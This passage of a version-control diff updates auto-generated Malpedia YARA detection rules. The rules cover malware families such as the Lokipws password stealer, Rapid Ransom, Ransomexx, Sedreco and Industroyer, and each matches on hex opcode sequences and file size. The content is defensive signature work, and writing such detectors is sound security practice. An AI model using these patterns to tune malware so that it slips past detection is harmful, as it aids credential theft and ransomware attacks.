+		logic_hash = "2b9e09a38ca4475522d0fb0fcb3945e7a2b5d830b8dfe7602d8b21ba629f63c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97509,34 +97723,34 @@ rule MALPEDIA_Win_Naplistener_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 18 8d01000001 1316 1116 16 110a }
-		$sequence_1 = { 38bbfdffff 1314 00 7251010070 }
-		$sequence_2 = { 7285000070 0c 06 6f0e00000a }
-		$sequence_3 = { 110c 110b 1110 6f2600000a }
-		$sequence_4 = { 6f2600000a 00 1106 6f2700000a 732800000a 1311 1111 }
-		$sequence_5 = { 00 de3a 00 1107 14 fe01 }
-		$sequence_6 = { 6f2700000a 1307 1107 09 16 09 8e }
-		$sequence_7 = { 110e 1110 18 8d01000001 }
-		$sequence_8 = { 281900000a 1109 6f1a00000a 130a 7283000070 1105 6f1b00000a }
-		$sequence_9 = { 06 6f3b00000a 16 fe01 }
+		$sequence_0 = { 6a64 6a00 ff15???????? 85c0 7509 8b45bc }
+		$sequence_1 = { ff15???????? 85c0 7509 8b45bc }
+		$sequence_2 = { ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? 50 }
+		$sequence_3 = { 81ec98050000 a1???????? 33c5 8945fc 53 56 57 }
+		$sequence_4 = { 6800080000 50 8d85fcf7ffff 50 e8???????? }
+		$sequence_5 = { 50 8d85fcf7ffff 68???????? 50 e8???????? 8d85fcf7ffff }
+		$sequence_6 = { 8d8578faffff 50 8d8584faffff 50 }
+		$sequence_7 = { 8d8578faffff 50 8d8584faffff 50 8d8574faffff }
+		$sequence_8 = { 6a01 8bf0 8d85a4fdffff 68???????? 50 ff15???????? 83c40c }
+		$sequence_9 = { 68???????? 50 e8???????? 8d85fcf7ffff 6800040000 50 }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 924672
 }
-rule MALPEDIA_Win_Lokipws_Auto : FILE
+rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c0fcf43-8505-5ab1-9538-f95766af9b37"
+		id = "c19fad8c-a407-5bf5-acec-08286bdf3f5a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lokipws_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rapid_ransom_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "a16d167a015bb2f0bb35ba7d5dec0418ca90b6fc4e94e3d241cc5d1eead21a9c"
+		logic_hash = "67800a8541a0930476ccb252960ba42436cf1502df6e201c2920e486423cdc16"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97548,32 +97762,37 @@ rule MALPEDIA_Win_Lokipws_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a62 668945f8 58 668945fa 33c0 50 50 }
-		$sequence_1 = { 6a0a e8???????? 59 33db 6a2e 5e }
-		$sequence_2 = { 55 8bec 6a00 6a00 686c425ad4 6a09 }
-		$sequence_3 = { 56 57 50 e8???????? 53 56 8d8574ffffff }
-		$sequence_4 = { 53 50 8d8550ffffff 50 e8???????? 83c424 }
-		$sequence_5 = { 85c0 745c 8b9d68ffffff 0fb603 89855cffffff 8b8564ffffff }
-		$sequence_6 = { eb1f ff75ec 50 e8???????? 59 59 85c0 }
-		$sequence_7 = { ff36 e8???????? 33c0 891e 83c41c }
-		$sequence_8 = { 6a2e 5a 6a64 59 6a6c 5e }
-		$sequence_9 = { e8???????? 8d4df8 51 57 57 6a01 }
+		$sequence_0 = { 50 6801000004 6800a40000 ff75f8 }
+		$sequence_1 = { eb05 803e00 7509 803a00 0f840c010000 }
+		$sequence_2 = { ff15???????? 8b4c2438 f6c110 7410 68???????? 56 }
+		$sequence_3 = { 6a00 6a07 6a00 ff75fc ffd7 }
+		$sequence_4 = { 75f7 ff75fc 51 6801000040 ff750c 53 ff15???????? }
+		$sequence_5 = { 84c0 0f94c1 33c0 84c9 5f 5e 0f94c0 }
+		$sequence_6 = { ff15???????? 56 ffd7 8bd0 8bce e8???????? }
+		$sequence_7 = { 80c261 8857ff 4b 75eb 8b75fc 5b }
+		$sequence_8 = { a3???????? e8???????? 83c404 b001 5e }
+		$sequence_9 = { 6a02 6a00 6a03 68000000c0 8d85f8feffff 50 }
+		$sequence_10 = { 56 ff15???????? 85c0 7448 8b3d???????? }
+		$sequence_11 = { 8d7601 80becc8c410000 75f4 e8???????? 99 8d4eff }
+		$sequence_12 = { 83ea01 75f2 8b7dac 8b55b4 33c0 c6043200 }
+		$sequence_13 = { 8d7f08 8b048dc4724000 ffe0 f7c703000000 7413 }
+		$sequence_14 = { eb05 1bc0 83c801 8b4df0 85c0 0f84a0feffff }
 
 	condition:
-		7 of them and filesize < 1327104
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Sneepy_Auto : FILE
+rule MALPEDIA_Win_Liteduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c029590c-a1be-50f8-80cf-c12927fcf1f6"
+		id = "ce6d7cbd-e712-527e-8d2e-e59cc7813425"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sneepy_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.liteduke_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "978ba91f40e008ec1e688527edb2f9c28d926adc71b28f1ad0432cb8831f1c4c"
+		logic_hash = "e8630c4a732088757bd3da58bb3967f30c07f9d1aee8531a027e677d423a3358"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97587,34 +97806,34 @@ rule MALPEDIA_Win_Sneepy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 c3 8bff 55 8bec b8e41a0000 e8???????? }
-		$sequence_1 = { 6888130000 ffd6 68???????? c705????????e8d44000 e8???????? 83c404 }
-		$sequence_2 = { 8b4dfc 33c0 83ff01 5b 0f94c0 }
-		$sequence_3 = { c1fa05 8b149560314100 59 c1e006 59 8a4dff 80c901 }
-		$sequence_4 = { 52 8945dc c745c801000000 8975cc }
-		$sequence_5 = { 89b5c0feffff 46 83fe07 7cdf }
-		$sequence_6 = { 85c0 7459 81bdb0feffffc8000000 7526 8b3d???????? 8d8dc0feffff 51 }
-		$sequence_7 = { e8???????? 8bc6 c1f805 8b048560314100 }
-		$sequence_8 = { 83e103 f3a4 8d8df0feffff 68???????? 51 e8???????? }
-		$sequence_9 = { 33c0 8945e4 83f805 7d10 668b4c4310 66890c4514314100 }
+		$sequence_0 = { c9 c20400 55 89e5 ff7508 6800010000 }
+		$sequence_1 = { 51 6821020000 50 6a21 50 6888c00700 ffb5d0fdffff }
+		$sequence_2 = { ad 6a04 59 c1c008 3c3d 7501 45 }
+		$sequence_3 = { 837d1001 7510 c745f810000000 c745fc0a000000 eb2a 837d1002 7510 }
+		$sequence_4 = { f70600000080 7409 8b06 25ffffff3f eb60 50 e8???????? }
+		$sequence_5 = { 8a03 52 50 6a03 e8???????? 83c408 5a }
+		$sequence_6 = { 7404 0113 ebca 2113 ebc6 58 }
+		$sequence_7 = { 50 ff15???????? 83c410 ff75e4 e8???????? 6800800000 }
+		$sequence_8 = { e8???????? 31c0 aa 61 c9 c20c00 55 }
+		$sequence_9 = { 21df 89d0 21f0 09f8 01c1 034dec }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1171456
 }
-rule MALPEDIA_Win_Railsetter_Auto : FILE
+rule MALPEDIA_Win_Sedreco_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40a35231-bcd6-50b5-8c16-f4224571abb5"
+		id = "f5874626-d0e0-58d9-91c8-0db502ae6b52"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.railsetter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.railsetter_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sedreco_auto.yar#L1-L422"
 		license_url = "N/A"
-		logic_hash = "1c0f0eee020c15b328d39cbed0a5c62b2c564fd1a70af2c0c1b9fc2367e71a1f"
+		logic_hash = "f4bff7c9ba602579624cb55726a1e993d47a39a8f6d5c8006861ce5f5842d524"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97626,32 +97845,69 @@ rule MALPEDIA_Win_Railsetter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4d20 ff15???????? 90 488d8dd0010000 e9???????? }
-		$sequence_1 = { 488d0ddc760400 eb07 488d0deb760400 ba11000000 }
-		$sequence_2 = { 488d8d10010000 ff15???????? 85c0 741a ff15???????? 8bc8 2b8d14010000 }
-		$sequence_3 = { 428a8c09687e0400 482bd0 8b42fc d3e8 49895008 41894018 0fb60a }
-		$sequence_4 = { 488d0d36a00500 e8???????? 488bc8 0fb754246e e8???????? 488bc8 e8???????? }
-		$sequence_5 = { 448d4205 488d0d4dae0400 e8???????? 0f57c0 0f1185c8000000 498bcc 49837c241810 }
-		$sequence_6 = { 488d05c3ef0200 488903 eb02 33db 48891f }
-		$sequence_7 = { 488d0d00690400 e8???????? ba19000000 448bca 448d4205 488d0d18640400 }
-		$sequence_8 = { 483bc1 0f8291010000 4c8d4d0f 48837d2710 4c0f434d0f }
-		$sequence_9 = { 48894a10 880a 488d153f360500 448d4115 488bcb e8???????? 488bc3 }
+		$sequence_0 = { 51 836d0804 53 56 8b750c }
+		$sequence_1 = { 8b750c 56 e8???????? 6a08 }
+		$sequence_2 = { e8???????? 89450c 56 85c0 }
+		$sequence_3 = { 55 8bec 51 836d0804 }
+		$sequence_4 = { c645ff30 e8???????? 85c0 7505 }
+		$sequence_5 = { 50 68???????? 6a0d 68???????? }
+		$sequence_6 = { 7411 6a04 68???????? 68???????? }
+		$sequence_7 = { 7ce0 a1???????? 5e 85c0 }
+		$sequence_8 = { 51 6802020000 68???????? 50 }
+		$sequence_9 = { 56 be???????? 8b06 85c0 740f 50 }
+		$sequence_10 = { ffd6 8b0d???????? 894104 85c0 }
+		$sequence_11 = { 751d 6afe 8d45f0 50 }
+		$sequence_12 = { 83c40c b801000000 8b4df0 64890d00000000 59 5f }
+		$sequence_13 = { 83c604 81fe???????? 7ce0 a1???????? }
+		$sequence_14 = { ffd6 8b0d???????? 898138010000 85c0 }
+		$sequence_15 = { 488b05???????? ff90e8000000 488b0d???????? 488b05???????? ff5028 48c705????????00000000 }
+		$sequence_16 = { c744242004000000 4533c9 4533c0 ba000000c0 488b0d???????? 488b05???????? }
+		$sequence_17 = { 68???????? e8???????? 8b35???????? 83c404 6a00 }
+		$sequence_18 = { 488b05???????? ff90e8000000 ba10270000 488b0d???????? 488b05???????? }
+		$sequence_19 = { 68???????? 6a00 6a00 ffd6 8b4dfc 5f }
+		$sequence_20 = { 4883c010 4883c428 c3 48890d???????? c3 48895c2410 }
+		$sequence_21 = { 33d2 33c9 488b05???????? ff90f0000000 488905???????? }
+		$sequence_22 = { 6800010000 6a00 68???????? e8???????? 6800020000 6a00 68???????? }
+		$sequence_23 = { 488b05???????? ff90e0000000 488b0d???????? 488b05???????? ff90a8010000 }
+		$sequence_24 = { 6a00 ffd6 50 68???????? 6aff 68???????? }
+		$sequence_25 = { 41b906000200 4533c0 488b15???????? 48c7c101000080 488b05???????? ff9038010000 }
+		$sequence_26 = { 8b442458 89442428 488b442450 4889442420 41b903000000 4533c0 488b15???????? }
+		$sequence_27 = { 7cd5 68???????? e8???????? 8b4dfc }
+		$sequence_28 = { 8b4dfc 5f 5e 33cd b8???????? 5b }
+		$sequence_29 = { 6a0a 8d45f4 50 51 e8???????? }
+		$sequence_30 = { 6800000080 8d85f0fdffff 50 ff15???????? 8bf0 83feff }
+		$sequence_31 = { 894df0 ff15???????? 8945fc 8b45f0 8945f4 8b45f4 50 }
+		$sequence_32 = { 57 c785ecfeffff01000000 c785e8feffffe197af54 0f6e85e8feffff }
+		$sequence_33 = { 53 56 57 894df0 ff15???????? 8945fc }
+		$sequence_34 = { 8bf1 8b06 50 8b08 ff9180000000 }
+		$sequence_35 = { 50 ff512c 8bce 8bd8 }
+		$sequence_36 = { 6aff 50 6a00 6a00 ff15???????? 5e }
+		$sequence_37 = { 53 56 57 c745dce197af54 0f6e45dc 0f72f002 }
+		$sequence_38 = { 6a07 68???????? e8???????? 85c0 7402 eb0d 68e0930400 }
+		$sequence_39 = { 52 50 8bce e8???????? 50 ffd7 85c0 }
+		$sequence_40 = { 895e30 895e2c 895e34 8bc6 5f 5e }
+		$sequence_41 = { c645fc04 50 e8???????? 83c418 6a01 }
+		$sequence_42 = { e8???????? 8b4e2c 8b5610 89442424 6aff 8d442428 6a00 }
+		$sequence_43 = { fe40ff eb3d 8b742448 6a01 53 }
+		$sequence_44 = { 8b4c2474 8b7c2478 8944241c 56 89442424 6a01 }
+		$sequence_45 = { 8bf0 8b442414 85c0 7505 a1???????? }
+		$sequence_46 = { ff15???????? 85c0 894604 7522 8d4de4 }
 
 	condition:
-		7 of them and filesize < 866304
+		7 of them and filesize < 1586176
 }
-rule MALPEDIA_Win_Lightbunny_Auto : FILE
+rule MALPEDIA_Win_Roll_Sling_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dde384fa-2d37-5576-aebe-de172bd52692"
+		id = "291394b2-c9d5-58b3-b157-b1e8265d7d6c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightbunny_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roll_sling"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roll_sling_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "df215a5e4e34e2b6ef794199d12d5fa957ff647111af41e6077ed16529a01062"
+		logic_hash = "fde2b7753670b142ee16bd9c69d80bdb5da3ac212825981d31dd1e2015cde6f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97665,32 +97921,32 @@ rule MALPEDIA_Win_Lightbunny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 b8???????? 90 3910 7412 0524100000 }
-		$sequence_1 = { e8???????? 8b55f4 83c404 b906000000 e8???????? e9???????? }
-		$sequence_2 = { 6a32 ff15???????? 8bcf e8???????? 8bf0 85f6 75e2 }
-		$sequence_3 = { 8d0485586e4100 50 8d8590faffff 03c7 50 e8???????? }
-		$sequence_4 = { ff36 894608 68???????? e8???????? 83c408 }
-		$sequence_5 = { 83b81810000000 0f85defeffff 83b82010000000 0f85d1feffff 6a00 }
-		$sequence_6 = { ff75f4 68???????? e8???????? 8b4df4 83c40c }
-		$sequence_7 = { c1f906 53 6bd830 56 8b048d20ae4100 }
-		$sequence_8 = { 69f224100000 81c6???????? 7410 c7460404000000 ff15???????? }
-		$sequence_9 = { 8b148520ae4100 8a4c1a2d f6c104 7419 8a441a2e 80e1fb }
+		$sequence_0 = { ba04000000 488bcf e8???????? 498bce 48833d????????10 480f430d???????? }
+		$sequence_1 = { 492bd0 4803d7 e8???????? 4533c9 4533c0 }
+		$sequence_2 = { 42385cf839 0f84ca000000 488d05a9ee0000 4a8b0ce8 488d55f0 4a8b4cf928 }
+		$sequence_3 = { 4c8d0d63b40000 8bda 4c8d0552b40000 488bf9 488d1550b40000 b904000000 e8???????? }
+		$sequence_4 = { 440f44d2 0fb74806 41ffc4 4c8b442468 4883c328 443be1 }
+		$sequence_5 = { 4883c227 4d8b6df8 492bc5 4883c0f8 4883f81f 0f877c040000 498bcd }
+		$sequence_6 = { 483bc3 7306 4c8bf3 488bd8 4533c9 4c8bc3 }
+		$sequence_7 = { 448bb090000000 4d03f7 498bce ff15???????? 85c0 0f8530010000 }
+		$sequence_8 = { eb14 4889742420 4c8d4da0 488bd6 }
+		$sequence_9 = { 4c89742428 4c897c2420 e8???????? 488bcb 488bf0 e8???????? }
 
 	condition:
-		7 of them and filesize < 2376704
+		7 of them and filesize < 299008
 }
-rule MALPEDIA_Win_Ransomexx_Auto : FILE
+rule MALPEDIA_Win_Touchmove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "094b727d-6615-5ea8-8297-ce60c4df65db"
+		id = "522c2cac-142c-5982-9c6b-182b0f82e223"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomexx_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.touchmove_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "88fc0fd7827f895e1a84baf4a50e5e79c472c52e50515dafeb1f3f74d8cf643c"
+		logic_hash = "b909bee1078b375a3a52a6b366cfda1d518438076dcea1e60cd1ece67d92cd0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97704,34 +97960,34 @@ rule MALPEDIA_Win_Ransomexx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1eb08 81e3ff000000 333c9db07a4200 8b5dec }
-		$sequence_1 = { 8a10 881406 40 49 75f7 8b7df0 }
-		$sequence_2 = { 8b0d???????? 6a04 8d45e8 6a00 50 ffd1 }
-		$sequence_3 = { 6a00 ff15???????? 85c0 7415 0fb745e0 8b0d???????? }
-		$sequence_4 = { 8d3c8500000000 8b0417 53 50 ff15???????? eb31 }
-		$sequence_5 = { b801000000 8945dc 8945e0 33f2 }
-		$sequence_6 = { 3b45ec 729b 8b4d10 8b5104 8955fc }
-		$sequence_7 = { 8d5df4 8d75e0 8bc3 e8???????? 8bf0 85f6 }
-		$sequence_8 = { b16c c7006e74646c c740046c2e646c 884808 50 ff15???????? }
-		$sequence_9 = { e8???????? 83c404 85c0 7520 8b4dfc f7d9 890f }
+		$sequence_0 = { 488d9520030000 488bcb 488905???????? ff15???????? }
+		$sequence_1 = { c7853417000073686f74 c6853817000000 e8???????? 488d8d30290000 }
+		$sequence_2 = { c785883b0000ef911211 c7858c3b0000ff7559a3 c785903b0000e16ea064 c785943b0000b8788977 c785983b0000a0379158 }
+		$sequence_3 = { 894720 488d05fdfdffff 48894728 488d0502feffff 48894730 488d0507feffff }
+		$sequence_4 = { 4c8d05d4acffff 89542420 83fa05 7d15 4863ca }
+		$sequence_5 = { 7577 c744246000010000 488d442460 4889442428 488d8580440000 4889442420 }
+		$sequence_6 = { c785200a00006b65726e c785240a0000656c3332 c785280a00002e646c6c c6852c0a000000 e8???????? }
+		$sequence_7 = { 488bdf 4889742430 4d8d570c 4c89642428 488d2d1f660100 492bdf 0f1f4000 }
+		$sequence_8 = { 83e001 894720 488d05fdfdffff 48894728 488d0502feffff }
+		$sequence_9 = { 66c785904000006572 c6859240000000 33d2 41b8ed000000 488d8d93400000 e8???????? 660f6f2d???????? }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 224256
 }
-rule MALPEDIA_Win_Rambo_Auto : FILE
+rule MALPEDIA_Win_Industroyer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "339a4d7e-9b02-5b2f-918a-fe5abee15d73"
+		id = "b70a6e6b-a7b3-5905-a2f3-bca4eedf28ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rambo_auto.yar#L1-L180"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industroyer_auto.yar#L1-L392"
 		license_url = "N/A"
-		logic_hash = "5e0ac76c4c54838a65e8020ef5ae20ae2814aaf559d8acf1871f9f9e1fb0aa1a"
+		logic_hash = "d3f1f022d180cc54e73fc2b0f9206b38d6547f8fb0af0d5f384afd232c2b0a2b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97743,77 +97999,101 @@ rule MALPEDIA_Win_Rambo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85f8faffff 6a01 50 ff15???????? 80a43df8faffff00 56 }
-		$sequence_1 = { 8065fe00 8d45fc 50 8d85f8feffff 50 c645fc72 }
-		$sequence_2 = { ff15???????? 83c428 6a32 ff15???????? 8d85f8faffff 50 }
-		$sequence_3 = { 83c410 85f6 745e 57 6a02 }
-		$sequence_4 = { 8d85ecfdffff 50 8d85f0feffff 50 ff15???????? 83c41c }
-		$sequence_5 = { 50 68???????? e8???????? 59 59 6a01 58 }
-		$sequence_6 = { 81ec14020000 8d85f0feffff 56 50 6804010000 }
-		$sequence_7 = { 59 8d85fcfeffff 59 50 ff15???????? 33c0 }
-		$sequence_8 = { 0f85ba000000 8d4c241c c68424000400000f e8???????? 8d8c249c000000 c68424000400000b e8???????? }
-		$sequence_9 = { 33c0 50 8d4c241c c684240404000002 }
-		$sequence_10 = { 03dd 33c3 8d1c31 33c3 81c14786c861 2bf8 4a }
-		$sequence_11 = { 57 b940000000 8d7c240d 8844240c f3ab 66ab }
-		$sequence_12 = { 56 56 8d4c2424 e8???????? 50 8d4c246c e8???????? }
-		$sequence_13 = { c684240004000001 e8???????? c684240004000000 8d4c2464 e8???????? 8d4c242c c7842400040000ffffffff }
-		$sequence_14 = { 33ed 6804010000 6804010000 8d4c2434 89ac2408040000 e8???????? }
-		$sequence_15 = { 8d4c2414 6a20 51 8d4c2424 e8???????? 50 8d4c242c }
+		$sequence_0 = { 53 ff75fc e8???????? 57 e8???????? 83c414 56 }
+		$sequence_1 = { 8d85f8fdffff 56 be04010000 56 50 68???????? }
+		$sequence_2 = { 8d45f4 50 56 57 53 ff15???????? 037df4 }
+		$sequence_3 = { 53 ffd6 53 e8???????? 59 85c0 }
+		$sequence_4 = { 68???????? 56 56 ff15???????? 57 8bf0 e8???????? }
+		$sequence_5 = { 50 6a02 56 e8???????? ff7710 6a03 56 }
+		$sequence_6 = { 8d45a8 33f6 57 50 e8???????? }
+		$sequence_7 = { 51 50 56 57 ff15???????? 56 e8???????? }
+		$sequence_8 = { 6a02 ff15???????? 8bd8 85db 0f849d000000 8d85d0fdffff c785d0fdffff2c020000 }
+		$sequence_9 = { ff15???????? 89849da0efffff 83c604 43 81fe88000000 7291 }
+		$sequence_10 = { 8b35???????? 0f1f00 f644241810 7451 }
+		$sequence_11 = { e8???????? 83c404 33c0 eb19 8d8d90efffff 51 }
+		$sequence_12 = { 81ec6c040000 a1???????? 33c4 89842468040000 53 8b1d???????? }
+		$sequence_13 = { 8b35???????? 39bdd8fdffff 741f 8d85d0fdffff 50 53 }
+		$sequence_14 = { 6800020000 8d85a0fbffff 50 56 ffb59cf3ffff ff15???????? 8b3d???????? }
+		$sequence_15 = { 0f847bffffff ffb59cf3ffff ffd7 8b4dfc 5f 33cd }
+		$sequence_16 = { 89442444 8b442418 89442440 8d44243c 50 }
+		$sequence_17 = { 8bcb 50 e8???????? 83c408 8d95d8fffeff 8bf0 }
+		$sequence_18 = { c745e0d4ff4000 e9???????? c745dc03000000 c745e0e0ff4000 e9???????? 83e80f 7451 }
+		$sequence_19 = { eb07 8b0cc5dc084100 894de4 85c9 }
+		$sequence_20 = { 7417 68???????? 50 ff15???????? 85c0 7407 6a00 }
+		$sequence_21 = { 7464 68???????? ff35???????? c705????????01000000 c705????????04000000 c705????????00000000 c705????????00000000 }
+		$sequence_22 = { 80480c01 eb04 80600cfe 807d1000 8b4604 }
+		$sequence_23 = { 8b4508 dd00 ebc6 c745e0e8ff4000 e9???????? c745e0f0ff4000 e9???????? }
+		$sequence_24 = { 8b34cd18c20110 8b4d08 6a5a 2bce 5b 0fb70431 663bc7 }
+		$sequence_25 = { 75f9 8d7c2430 2bd6 4f 8a4701 47 84c0 }
+		$sequence_26 = { 8945dc 8b1c9dd01f0210 895de0 f6441a2848 8b5d08 0f84ce000000 }
+		$sequence_27 = { c7825402000000000000 c7825802000000000000 8b8350020000 898250020000 8b8354020000 }
+		$sequence_28 = { f6470280 760d 68???????? e8???????? 83c404 }
+		$sequence_29 = { 0f1f440000 8a02 42 84c0 75f9 8d7c2430 2bd6 }
+		$sequence_30 = { 660f59f5 660f28aa40fe4000 660f54e5 660f58fe }
+		$sequence_31 = { e9???????? 894ddc c745e0d8ff4000 e9???????? }
+		$sequence_32 = { 33c2 2500800000 83f800 0f8547ffffff e9???????? 8b542408 }
+		$sequence_33 = { 59 8bf0 6a01 8bce e8???????? 8d45f8 c706???????? }
+		$sequence_34 = { 88d8 e2d9 8dbe00000600 8b07 09c0 }
+		$sequence_35 = { 83eb01 741e 83eb01 7549 399ffc000000 7441 }
+		$sequence_36 = { 894e10 e8???????? 59 59 85c0 }
+		$sequence_37 = { ba05000000 8d0d905b4400 e9???????? a90000f07f 752c a9ffff0f00 }
+		$sequence_38 = { 773c 2b4334 99 f77d8c 894598 3b4b3c }
+		$sequence_39 = { 7451 8b7d08 8b4514 8b4d10 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 983040
 }
-rule MALPEDIA_Win_Sync_Scheduler_Auto : FILE
+rule MALPEDIA_Win_Sodamaster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41472b7c-c76e-5a55-ab89-47e49be56775"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sync_scheduler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sync_scheduler_auto.yar#L1-L121"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "d1f7db4a-f731-535e-9ec7-0f94492b7206"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sodamaster_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "cefc3130f1fb15a7eb3be2d60b81171c09dab6a15007b67a76905b9641705749"
+		logic_hash = "fa1144cbcb2ad99084cc1ee6d93d89428028e0238c89b4c179e1b18530e08c7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b910270000 ff15???????? 90 488b55f8 4883fa10 7231 }
-		$sequence_1 = { 498bcd ff15???????? 498bcc ff15???????? e9???????? 0f57c0 }
-		$sequence_2 = { 33d2 488bc8 ff15???????? 488d0557570000 488903 48896e60 48895e08 }
-		$sequence_3 = { c6450668 c6450777 c6450855 c6450968 c6450a64 c6450b67 c6450c49 }
-		$sequence_4 = { 480f42d8 48b8ffffffffffffff7f 488d4b01 483bc8 0f87ad000000 4803c9 4881f900100000 }
-		$sequence_5 = { 75cb 32db 4883fe10 7238 488d5601 }
-		$sequence_6 = { e8???????? 488d0d9c090000 e8???????? e8???????? }
